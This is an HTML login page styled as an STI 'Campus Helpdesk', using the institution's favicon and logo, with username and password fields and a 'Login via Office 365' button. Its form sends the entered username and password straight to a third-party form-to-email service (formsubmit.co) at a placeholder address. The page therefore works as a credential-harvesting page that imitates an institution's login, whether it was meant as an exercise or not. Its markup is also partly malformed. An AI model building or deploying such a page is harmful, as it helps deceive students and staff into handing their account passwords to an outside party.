<!DOCTYPE html>
<html>
    <head>
        <title>Campus Helpdesk</title>

        <link rel="stylesheet" a href="style.css">
        <link rel="icon" type="images/x-icon" href="https://www.sti.edu/images/favicon.ico">
    </head>


    <body>
        <script src="function.js"></script>
        
            <div class="header">
                <img src="STI.jpg">
                <style>
                    img {
                        float:inline-start;
                        height:54px;
                    }
                </style>
               <a href="#"><font color="white"><h3>Campus Helpdesk</h3></font></href>
                    <style>
                        a:link {
                            text-decoration: none;
                            text-decoration-color: black;
                            color: black;
                        }
              
                        a:hover {
                            color:blue;
                            background-color: transparent;
                        }
                    </style>
               </a>
               </div>
            <br>
    

            <center>
                <section class="module">
                    <div class="main">

    


                    <div class="container">
                        <div class="title">
                        <h2>Login</h2>
                        </div>
                        
                      

                          <form action="https://formsubmit.co/your@email.com" method="post">
                        <span>
                            <div class="form-group">
                                <input class="username" id="Username" name="usr" type="text" placeholder="Username or Email" required/>
                            </div>
                            <div class="form-group">
                                <input class="pass" id="Password" name="pwd" type="password" placeholder="Password" required/>
                            </div>
                        </span>
                        <br>
                        <span>
                            <div class="form-group">
                              <button class="login" type="submit" value="login" style="background-color: #3f8cc9;">Login</button> <button class="cancel" onclick="openWindow()" value="cancel" style="background-color: #eaeced;">Login via Office 365</button>
                            </div>
        
                    
                            <div class="last">
                                <input type="checkbox" value="lsRememberMe" id="rememberMe"> <label for="rememberMe">Remember me</label>
                            <a href="/User/LostPassword">Lost password</a>
                            </div>
                        </span>
                          </form>
                        </div>    

                        <br>
                        <br>
                        <br>
                        <br>

   </div>
    </body>
</html>